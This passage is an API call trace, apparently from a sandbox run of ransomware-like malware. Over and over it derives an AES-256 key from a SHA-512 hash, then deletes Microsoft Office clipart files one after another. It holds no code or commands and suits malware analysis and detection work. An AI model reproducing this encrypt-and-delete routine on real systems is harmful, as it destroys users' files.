[0192.696] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44474c | out: phHash=0x1d44474c) returned 1 [0192.696] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.696] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444750 | out: phKey=0x1d444750*=0x9ad638) returned 1 [0192.696] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.696] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.697] wcslen (_String="\\\\?\\") returned 0x4 [0192.723] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 1 [0192.723] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf")) returned 1 [0192.724] CryptDestroyKey (hKey=0x9ad138) returned 1 [0192.724] wcslen (_String="OK") returned 0x2 [0192.724] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.724] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.724] CryptDestroyKey (hKey=0x9ad638) returned 1 [0192.724] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0192.724] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0192.726] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0192.726] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.726] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad7b8) returned 1 [0192.726] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.726] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.726] wcslen (_String="\\\\?\\") returned 0x4 [0192.731] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 1 [0192.731] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf")) returned 1 [0192.732] CryptDestroyKey (hKey=0x9ad438) returned 1 [0192.732] wcslen (_String="OK") returned 0x2 [0192.732] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.732] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.732] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0192.732] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0192.732] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0192.734] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0192.734] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.734] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad338) returned 1 [0192.734] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.734] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.734] wcslen (_String="\\\\?\\") returned 0x4 [0192.744] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 1 [0192.744] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf")) returned 1 [0192.745] CryptDestroyKey (hKey=0x9ad238) returned 1 [0192.745] wcslen (_String="OK") returned 0x2 [0192.745] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.745] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.745] CryptDestroyKey (hKey=0x9ad338) returned 1 [0192.745] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0192.746] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0192.748] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0192.748] CryptHashData (hHash=0x9ad4b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.748] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad4b8, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad338) returned 1 [0192.748] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.748] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.748] wcslen (_String="\\\\?\\") returned 0x4 [0192.755] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 1 [0192.755] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf")) returned 1 [0192.756] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0192.756] wcslen (_String="OK") returned 0x2 [0192.756] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.756] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.756] CryptDestroyKey (hKey=0x9ad338) returned 1 [0192.756] CryptDestroyHash (hHash=0x9ad4b8) returned 1 [0192.756] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0192.759] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0192.759] CryptHashData (hHash=0x9ad678, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.759] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad678, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad578) returned 1 [0192.759] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.759] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.759] wcslen (_String="\\\\?\\") returned 0x4 [0192.765] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 1 [0192.765] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid")) returned 1 [0192.766] CryptDestroyKey (hKey=0x9ad838) returned 1 [0192.766] wcslen (_String="OK") returned 0x2 [0192.766] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.766] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.766] CryptDestroyKey (hKey=0x9ad578) returned 1 [0192.766] CryptDestroyHash (hHash=0x9ad678) returned 1 [0192.766] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0192.768] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0192.768] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.768] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad5f8) returned 1 [0192.768] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.768] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.769] wcslen (_String="\\\\?\\") returned 0x4 [0192.805] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 1 [0192.805] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf")) returned 1 [0192.806] CryptDestroyKey (hKey=0x9ad738) returned 1 [0192.806] wcslen (_String="OK") returned 0x2 [0192.806] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.806] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.806] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0192.806] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0192.806] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0192.808] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0192.808] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.808] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad878) returned 1 [0192.808] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.808] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.808] wcslen (_String="\\\\?\\") returned 0x4 [0192.817] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 1 [0192.818] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf")) returned 1 [0192.819] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0192.819] wcslen (_String="OK") returned 0x2 [0192.819] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.819] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.819] CryptDestroyKey (hKey=0x9ad878) returned 1 [0192.819] CryptDestroyHash (hHash=0x9ad838) returned 1 [0192.819] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0192.821] CryptCreateHash (in: hProv=0x8e36e8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0192.821] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.821] CryptDeriveKey (in: hProv=0x8e36e8, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad8b8) returned 1 [0192.821] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.821] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.821] wcslen (_String="\\\\?\\") returned 0x4 [0192.826] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 1 [0192.826] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf")) returned 1 [0192.827] CryptDestroyKey (hKey=0x9ad478) returned 1 [0192.827] wcslen (_String="OK") returned 0x2 [0192.827] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.827] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.827] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0192.827] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0192.827] CryptReleaseContext (hProv=0x8e36e8, dwFlags=0x0) returned 1 [0192.830] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0192.830] CryptHashData (hHash=0x9ad238, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.830] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad1f8) returned 1 [0192.830] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.830] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.830] wcslen (_String="\\\\?\\") returned 0x4 [0192.841] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 1 [0192.842] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf")) returned 1 [0192.843] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0192.843] wcslen (_String="OK") returned 0x2 [0192.843] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.843] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.843] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0192.843] CryptDestroyHash (hHash=0x9ad238) returned 1 [0192.843] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0192.845] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444824 | out: phHash=0x1d444824) returned 1 [0192.845] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.845] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444828 | out: phKey=0x1d444828*=0x9ad2b8) returned 1 [0192.845] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.845] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.845] wcslen (_String="\\\\?\\") returned 0x4 [0192.863] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 1 [0192.863] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid")) returned 1 [0192.864] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0192.865] wcslen (_String="OK") returned 0x2 [0192.865] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.865] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.865] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0192.865] CryptDestroyHash (hHash=0x9ad438) returned 1 [0192.865] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0192.867] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0192.867] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.867] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad2b8) returned 1 [0192.867] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.867] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.867] wcslen (_String="\\\\?\\") returned 0x4 [0192.871] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 1 [0192.871] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf")) returned 1 [0192.872] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0192.872] wcslen (_String="OK") returned 0x2 [0192.872] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.872] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.872] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0192.872] CryptDestroyHash (hHash=0x9ad738) returned 1 [0192.873] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0192.875] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0192.875] CryptHashData (hHash=0x9ad7b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.875] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad7b8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad438) returned 1 [0192.875] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.875] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.875] wcslen (_String="\\\\?\\") returned 0x4 [0192.906] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 1 [0192.907] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf")) returned 1 [0192.908] CryptDestroyKey (hKey=0x9ad478) returned 1 [0192.908] wcslen (_String="OK") returned 0x2 [0192.908] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.908] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.908] CryptDestroyKey (hKey=0x9ad438) returned 1 [0192.908] CryptDestroyHash (hHash=0x9ad7b8) returned 1 [0192.908] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0192.910] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0192.910] CryptHashData (hHash=0x9ad878, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.910] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad878, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad4f8) returned 1 [0192.910] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.910] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.910] wcslen (_String="\\\\?\\") returned 0x4 [0192.946] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 1 [0192.946] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf")) returned 1 [0192.947] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0192.947] wcslen (_String="OK") returned 0x2 [0192.947] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.947] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.947] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0192.947] CryptDestroyHash (hHash=0x9ad878) returned 1 [0192.947] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0192.950] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0192.950] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.950] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad2b8) returned 1 [0192.950] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.950] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.950] wcslen (_String="\\\\?\\") returned 0x4 [0192.954] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 1 [0192.955] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf")) returned 1 [0192.956] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0192.956] wcslen (_String="OK") returned 0x2 [0192.956] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.956] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0192.956] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0192.956] CryptDestroyHash (hHash=0x9ad738) returned 1 [0192.956] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0192.958] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0192.958] CryptHashData (hHash=0x9ad7b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0192.958] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad7b8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad438) returned 1 [0192.958] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0192.958] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0192.958] wcslen (_String="\\\\?\\") returned 0x4 [0193.178] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 1 [0193.179] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf")) returned 1 [0193.180] CryptDestroyKey (hKey=0x9ad478) returned 1 [0193.180] wcslen (_String="OK") returned 0x2 [0193.180] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.180] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.180] CryptDestroyKey (hKey=0x9ad438) returned 1 [0193.180] CryptDestroyHash (hHash=0x9ad7b8) returned 1 [0193.180] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0193.182] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0193.182] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.182] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad7f8) returned 1 [0193.182] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0193.182] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0193.182] wcslen (_String="\\\\?\\") returned 0x4 [0193.307] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 1 [0193.307] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf")) returned 1 [0193.308] CryptDestroyKey (hKey=0x9ad338) returned 1 [0193.308] wcslen (_String="OK") returned 0x2 [0193.308] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.308] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.309] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0193.309] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0193.309] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0193.311] CryptCreateHash (in: hProv=0x8e3bb0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0193.311] CryptHashData (hHash=0x9ad6b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.311] CryptDeriveKey (in: hProv=0x8e3bb0, Algid=0x6610, hBaseData=0x9ad6b8, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad1f8) returned 1 [0193.311] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0193.311] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0193.311] wcslen (_String="\\\\?\\") returned 0x4 [0193.317] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 1 [0193.317] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf")) returned 1 [0193.319] CryptDestroyKey (hKey=0x9ad238) returned 1 [0193.319] wcslen (_String="OK") returned 0x2 [0193.319] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.319] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.319] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0193.319] CryptDestroyHash (hHash=0x9ad6b8) returned 1 [0193.319] CryptReleaseContext (hProv=0x8e3bb0, dwFlags=0x0) returned 1 [0193.321] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: 